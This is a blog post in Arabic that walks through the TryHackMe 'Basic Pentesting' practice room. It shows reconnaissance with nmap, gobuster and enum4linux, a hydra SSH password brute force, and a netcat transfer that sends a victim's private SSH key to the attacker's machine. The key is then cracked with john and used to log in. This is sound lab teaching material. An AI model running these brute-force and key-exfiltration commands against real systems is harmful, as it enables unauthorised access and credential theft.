TryHackMe|BasicPentesting WriteUp\Walkthrough (Arabic)
بسم الله
اللي يبغى يشوف الحل مشروح فيديو يرجع للفيديو على قناتي باليوتيوب
على هذا الرابط:
رابط التحدي:
====================================================
كلمة IP في كل
الكوماندز اللي أكتبها تُستبدل بالـIP للمشين حقتكم على TryHackMe
أول حاجة نشغل الـmachine ونتأكد إننا اتصلنا بشبكة TryHackMe والاتصال مضبوط، بعدين نبدأ بأول خطوة للحل
وهي إننا نسوي scan للشبكة
باستخدام nmap
sudo nmap IP -vv
طلع معانا 6 بورتات، نرجع نسوي Aggressive سكان على نفس هذه البورتات
sudo nmap IP -vv -A -p 22,80,139,445,8009,8080
بورت 22 عليها SSH، وعرفنا من خلال الـversion إن نظام التشغيل هو ubuntu، بورت 80 و 8009 و 8080 كلها عليها web servers.
إذا زرنا بورت 80 على المتصفح مكتوب رسالة under going maintenance وفي الـsource code عندنا ملاحظة
يقول شيك على dev notes، لكن وينها هذه الملاحظات؟؟، فممكن يكون في مسارات موجودة غير المسار الرئيسي، وعشان نعرف بنسوي directory enumeration باستخدام gobuster
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP/ -t 64
طلع معانا المسار development
نروح له في المتصفح، وبنلاقي ملفين نصية، الملف dev.txt فيه محادثة بين J و K، معناته احتمال كبير يكون عندي مستخدمين على النظام، واحد اسمه يبدأ بـ J والثاني بـ K.
في الملف الثاني j.txt الرسالة قادمة من K ويقول فيها لـJ إنه قدر يعرف كلمة السر له، ولازم يغيرها بأسرع وقت.
معناته إننا نقدر نسوي crack لكلمة السر لـJ، لكن المشكلة إن احنا ما نعرف اسمه كامل، فقط أول حرف، لكن بما إن جهاز الضحية شغال عليه smb، معناته أقدر أستخدم enumrlinux عشان أسوي سكان على الجهاز ونعرف أسماء المستخدمين، فبنشغل هذه الكوماند
enum4linux -a IP
بعد ما تنتهي بيطلع معانا أسماء المستخدمين وهم Kay و Jan
فالحين ناخذ jan ونسوي عليه bruteforce باستخدام hydra
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://IP -t 64
وبنحصل على كلمة السر، ثم نستخدمها عشان نسجل دخول على النظام باستخدام ssh
ssh jan@IP
نروح للـhome ثم لـjan
cd /home/jan
ls
وما في شيء مهم، نروح لـkay
في ncat الـlistener هو اللي
يستقبل والـClient هو اللي يرسل، ولازم نشغل الـlistener قبل الـclient
على جهازنا
nc -nlvp 1233 > id_rsa
على الضحية
nc -nv
OpenVPN-IP 1233 < id_rsa
لما يجينا الملف على جهازنا ونفتح بنلاحظ إنه مشفر، وعشان نفك التشفير نستخدم john
ssh2john id_rsa > hash
john hash
وبنحصل على كلمة السر اللي تخلينا نقدر نستخدمه ونتصل بالضحية، باقي خطوة وحده عشان نقدر نستخدمه بنجاح واللي هي إننا نغير صلاحيات الملف
chmod 400 id_rsa
ثم نتصل بالضحية
ssh kay@IP -i id_rsa
ثم بيطلب كلمة السر، نعطيه كلمة السر اللي تو حصلنا عليها، وبكذا نكون دخلنا على حساب kay
ثم نعرض الملف pass.bak وبكذا يكون حصلنا على الفلاق✨ وانتهينا من الحل.
وهنا إجابات الأسئلة باستنثاء كلمات السر والفلاق:







Comments
Post a Comment